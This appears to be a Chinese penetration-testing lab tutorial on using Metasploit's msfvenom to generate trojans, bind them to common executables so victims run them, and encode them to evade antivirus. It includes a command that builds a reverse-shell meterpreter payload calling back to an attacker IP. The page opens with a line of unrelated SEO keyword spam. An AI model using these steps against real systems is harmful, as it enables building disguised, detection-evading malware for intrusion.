网站开发免责声明,常用的网站推广方法,开发app工具,销售管理软件排行简介#xff1a; 在渗透测试的过程中#xff0c;避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段#xff0c;而为了躲避杀毒软件的查杀#xff0c;我们又不得不对木马进行免杀处理。本…简介 在渗透测试的过程中避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段而为了躲避杀毒软件的查杀我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高想要免杀需要用shellter工具捆绑下但是处理后木马文件还是能被360检测到拦截下来。
实验环境
Kali Linux
知识点
msfvenom 如何生成木马 msfvenom 如何捆绑木马到常用软件 msfvenom 如何对木马进行编码免杀
Metasploit介绍
Metasploit是一个可用来发现、验证和利用漏洞的渗透测试平台目前实验环境中Metasploit的版本是v4.12.23-dev包含了1577个exploits、907个auxiliary、272个post、455个payloads、39个encoders以及8个nops。
其中exploits是漏洞利用模块(也叫渗透攻击模块)auxiliary是辅助模块post是后渗透攻击模块payloads是攻击载荷也就是我们常说的shellcode这里生成的木马其实就是payloads。
在本次试验中我们主要使用的是msfpayload攻击荷载生成器msfencoder编码器的替代品msfvenommsfvenom集成了前两者的全部功能可以生成payload本节所说的木马以及对payload编码免杀和避免坏字符、捆绑木马等。在Kali Linux中默认安装了Metasploit framework 我们可以直接使用。
攻击机Kali Linux 2.0 虚拟机主机名是 kaliIP 地址为 192.168.122.101默认用户名和密码为 root/toor。
靶机Metasploitable2 虚拟机主机名是 targetIP 地址为 192.168.122.102默认用户名和密码为 msfadmin/msfadmin。
本次实验我们只用到 Kali linux 虚拟机。
我们先来查看当前环境虚拟机的列表和状态
因环境中虚拟机太慢这里采用 docker 容器。进入 kali linux 系统的方式如下
生成木马
在进行木马生成实验之前我们先来学习一下msfvenom命令的用法。在 Kali linux 下输入如下命令,可以看到msfvenom的命令行选项。
./msfvenom -h
捆绑木马
通常我们生成了木马之后要运用社会工程学的攻击方式诱骗目标运行我们的木马程序否则我们的木马只是玩具罢了。
捆绑木马我们还是使用上面提到的msfvenom命令只不过这里我们要用到一个新的命令行选项-x。我们来看一下-x选项的用法及含义。
-x选项允许我们指定一个自定义的可执行文件作为模板也就是将木马捆绑到这个可执行文件上。
将生成的木马当做常用应用程序来捆绑木马。
虽然我们已经准备好了木马程序并且也捆绑到了常用的应用程序上但是现在杀毒软件泛滥不经过免杀就算成功上传到目标主机估计还没等运行就被杀掉了。这里用msfvenom生成木马同时对payload编码来实现木马的简单免杀。我们先来学习一下我们要用到的命令选项:
-e选项用来指定要使用的编码器。 -i选项用来指定对payload编码的次数。 先来看一下都有哪些编码器可用
这里我们挑选一个免杀效果比较好的编码器x86/shikata_ga_nai进行编码
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST192.168.122.101 -e x86/shikata_ga_nai -i 5 -f elf -o /root/payload_encoder.elf
总结
从图中我们可以看到完成了对木马的5次编码这样木马基本上就可以躲避部分杀毒软件的查杀其实还可以对木马程序进行多次编码虽然可以提高木马的免杀几率不过可能会导致木马程序不可用。当然要想免杀效果更好就需要使用Metasploit pro版本或者给木马加壳、修改木马的特征码等等不过要想躲过全部杀毒软件的查杀则会有些难度通常会针对某个杀毒软件进行免杀。
原文链接 本文为阿里云原创内容未经允许不得转载。
